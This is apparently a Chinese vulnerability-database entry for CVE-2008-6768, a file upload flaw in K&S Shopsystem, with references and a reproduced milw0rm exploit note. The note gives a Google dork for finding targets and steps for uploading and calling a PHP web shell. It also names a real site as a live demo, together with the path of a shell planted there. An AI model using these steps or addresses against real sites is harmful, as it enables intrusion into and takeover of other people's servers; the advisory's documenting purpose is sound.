Shopsystem-Forum K&S Shopsystem 'admin/editor/images.php'未限制文件上传漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117074 漏洞类型 其他
发布时间 2008-12-17 更新时间 2009-04-30
CVE编号 CVE-2008-6768 CNNVD-ID CNNVD-200904-530
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/7500
https://cxsecurity.com/issue/WLB-2009050082
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200904-530
|漏洞详情
K&SShopsoftware中的admin/editor/images.php存在未限制文件上传漏洞。远程攻击者可以通过先上传一个带有可执行性扩展名的文件,然后再借助一个对images/upload/中的文件的直接请求来访问它,从而实现任意代码执行。
|漏洞EXP
## Script Name: Shopsysteme (new version oscommerce)

## Download: http://www.shopsystem-forum.de/product_info.php?cPath=22&products_id=43 (299 euro)  :) 

## Author: mNt

## File Upload Bug

## Google Dork: intext:Powered by K&S Media Concept - Shopsysteme [Powered by K&S Media Concept - Shopsysteme için yaklaşık 32.900 sonuçtan 191 - 200 arası sonuçlar (0,51 saniye)]

## Use:

http://www.example.com/

after add: /admin/editor/images.php ==> http://www.example.com/admin/editor/images.php

File uploaded php shell

after in url: http://www.example.com/images/upload/mNt.php

Attention: Shell Code Ä°n GIF89;a

## Live demo: http://www.trampleandfetish.de/admin/editor/image.php

## Php Shell Adres: http://www.trampleandfetish.de/images/upload/data.php

## Thanks: DelİDolU, HeDgEs, Scarface, Cih@t, Suskun Dünyam, Lodos2005, Sabotage

## web Site: www.rootingforced.org || www.rootingforced.com || www.rootingforced.net

# milw0rm.com [2008-12-17]
|参考资料

来源:XF
名称:shopsystemexclusivplus-images-file-upload(47424)
链接:http://xforce.iss.net/xforce/xfdb/47424
来源:BID
名称:32888
链接:http://www.securityfocus.com/bid/32888
来源:MILW0RM
名称:7500
链接:http://www.milw0rm.com/exploits/7500
来源:SECUNIA
名称:33212
链接:http://secunia.com/advisories/33212
来源:OSVDB
名称:51210
链接:http://osvdb.org/51210